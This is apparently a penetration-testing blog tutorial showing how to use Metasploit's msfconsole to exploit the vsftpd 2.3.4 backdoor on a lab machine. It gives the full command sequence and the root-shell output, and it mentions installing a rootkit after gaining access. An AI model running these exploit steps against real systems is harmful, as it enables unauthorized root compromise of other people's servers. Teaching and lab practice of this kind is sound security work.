Of course we will use Metasploit, but more specificity we will use the msfconsole interface. Why not use the GUI? Simply put, command line interfaces are easier to automate through scripts, and the goal of any good IT professional is to automate as much as their workload as possible.
So, from your BackTrack 5R2 machine, open a terminal and type:
msfconsoleDepending on the speed of your machine, it could take a minute or two before you see any movement. This is even more prevalent if you are using a bootable version, so have patience. Once you get a command prompt back, the easiest way to find an exploit is to search for it using the search command. Let's pick on vsftpd and see what exploits are available.
msf > search vsftpd
Matching Modules
=================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
Exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 00:00:00 UTC excellent VSFTPD v2.3.4 Backdoor Command ExecutionA backdoor, that sounds promising, let's use that one. To do so enter in the following command:
use exploit/unix/ftp/vsftpd_234_backdoorYou will note that your command prompt changes to include the exploit. To see what options and available type: show options
msf exploit(vsftpd_234_backdoor) > show options
Module options (exploit/unit/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 21 yes The target port
Exploit target:
Id Name
-- ----
0 Automatic
To see what payloads are available use the show payloads command.
msf exploit(vsftpd_234_backdoor) > show payloads
Compatible Payoads
==================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/unix/interact normal Unix Command, Interact with Established ConnectionBefore we can exploit our target we need to set some options and pick a payload. For this exploit it's fairly straight forward since we only have to set the target IP address and select the only payload we want (you'll note the target port number is already set to 21).
To set the target IP address enter:
set RHOST 192.168.10.107To set the payload enter:
set payload cmd/unix/interactAnd to exploit simply enter:
exploitIf all goes well you should receive some output that looks like this.
[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 2 opened (192.168.10.100:51396 -> 192.168.10.107:6200) at 2012-11-26 19:30:23 -0600You will also note that you do not receive a command prompt back. This is because you are now on your target system. To prove this enter in a command like ifconfig. You should see the IP information for your target. Since we are root, you are now free to do just about anything you want; such as create a user, install a rootkit, start/stop demons, etc. To get back to the msfconsole interface while leaving the session running, use Ctrl+z. If you exit or use the Ctrl+C combination you will close the session to your target.
Now this is a very simple exploit that is well documented, so we're definitely not breaking new ground here. This is just an example of how we can use Metasploit to gain access after finding a vulnerable service during a scan.
Next we'll look a few more advanced options of Metasploit and start digging into some automation.
Until next time, thanks for reading.
Michael
No comments:
Post a Comment